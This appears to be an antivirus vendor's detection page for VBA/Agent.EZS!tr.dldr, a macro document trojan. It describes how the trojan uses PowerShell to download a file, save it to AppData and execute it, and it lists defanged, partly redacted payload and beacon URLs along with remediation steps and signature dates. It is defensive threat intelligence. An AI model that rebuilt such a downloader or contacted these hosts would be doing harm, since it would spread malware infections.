VBA/Agent.EZS!tr.dldr

description-logoAnalysis



VBA/Agent.EZS!tr.dldr is a generic detection for a Macro/PowerShell Downloader Trojan. Since this is a generic detection, this malware may have varying behaviour.
Below are some of the observed characteristics/behaviours for this infection:

  • This malicious document issues a powershell command line that may download from any of the remote site listed below, then usually saves it as %AppData%\[Random].exe, afterwhich executes it.
    • hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc
    • hxxp://adojqnwdiqzxcqwdqw{Removed}.com/TZ/goblin.pyc
    • hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc
    • hxxp://adojqnwdiqzxcqwdqw{Removed}.com/TZ/goblin.pyc
    • hxxp://kkduacizhbadqw{Removed}.com/XL/itron.pyc
    • hxxp://arniytreegoogofasti{Removed}.com/TZ/mnxok.pyc
    • hxxp://apjbqjasdqeee{Removed}.com/XL/trond.pyc
    • hxxp://arniytreegoogofasti{Removed}.com/TZ/mnxok.pyc
    • hxxp://bccxgddsiugj{Removed}.com/TZ/itnask.pyc
    • hxxp://apjbqjasdqeee{Removed}.com/XL/tronc.pyc
    During the time of our test the download did not materialize.

  • This malware was also observed to connect to the same site but using the following URL:
    • hxxp://kkduacizhbadqw{Removed}.com/s.php?id=itron
    • hxxp://adojqnwdiqzxcqwdqw{Removed}.com/s.php?id=goblin
    • hxxp://kkduacizhbadqw{Removed}.com/s.php?id=itron
    • hxxp://adojqnwdiqzxcqwdqw{Removed}.com/s.php?id=goblin
    • hxxp://kkduacizhbadqw{Removed}.com/s.php?id=itron
    • hxxp://arniytreegoogofasti{Removed}.com/s.php?id=mnxok
    • hxxp://apjbqjasdqeee{Removed}.com/s.php?id=trond
    • hxxp://arniytreegoogofasti{Removed}.com/s.php?id=mnxok
    • hxxp://bccxgddsiugj{Removed}.com/s.php?id=itnask
    • hxxp://apjbqjasdqeee{Removed}.com/s.php?id=tronc

  • Below are illustrations of infected document(s):

    • Figure 1: Infected document.




recommended-action-logoRecommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
Extended
FortiClient
FortiMail
FortiSandbox
FortiWeb
Web Application Firewall
FortiIsolator
FortiDeceptor
FortiEDR

Version Updates

Date Version Detail
2019-05-03 68.25000 Sig Added
2019-05-03 68.24700 Sig Updated